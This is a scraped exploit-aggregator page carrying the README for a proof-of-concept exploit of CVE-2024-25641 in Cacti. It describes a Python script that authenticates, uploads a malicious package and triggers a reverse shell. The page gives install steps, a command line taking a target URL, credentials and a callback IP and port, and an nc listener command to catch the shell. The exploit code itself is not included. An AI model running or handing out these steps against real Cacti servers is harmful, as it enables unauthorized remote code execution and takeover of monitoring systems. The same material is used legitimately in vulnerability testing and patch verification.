Exploit for CVE-2024-25641 exploit

Share

## https://sploitus.com/exploit?id=79F09F96-046D-52D1-9019-13C34ABABBB8 # Cacti CVE-2024-25641 Authenticated Package Upload RCE Proof of Concept (PoC) This script is a Proof of Concept (PoC) for exploiting the CVE-2024-25641 vulnerability in Cacti, a web-based monitoring tool. The script automates the process of authenticating with the application, uploading a malicious package, and triggering a reverse shell. ## Requirements - Python 3.x - `requests` library - `argparse` library - `re` library You can install the required Python library using pip3: ```bash pip3 install requests pip3 install argparse pip3 install re ``` ## Usage (make sure to place the **test.xml.gz** in the same directory as the **exploit.py**) ```bash python3 exploit.py --url <TARGET_URL> -u <USERNAME> -p <PASSWORD> -i <LOCAL_IP> -l <PORT> [--proxy] ``` ## Start nc listener ```bash nc -nvlp <port> ```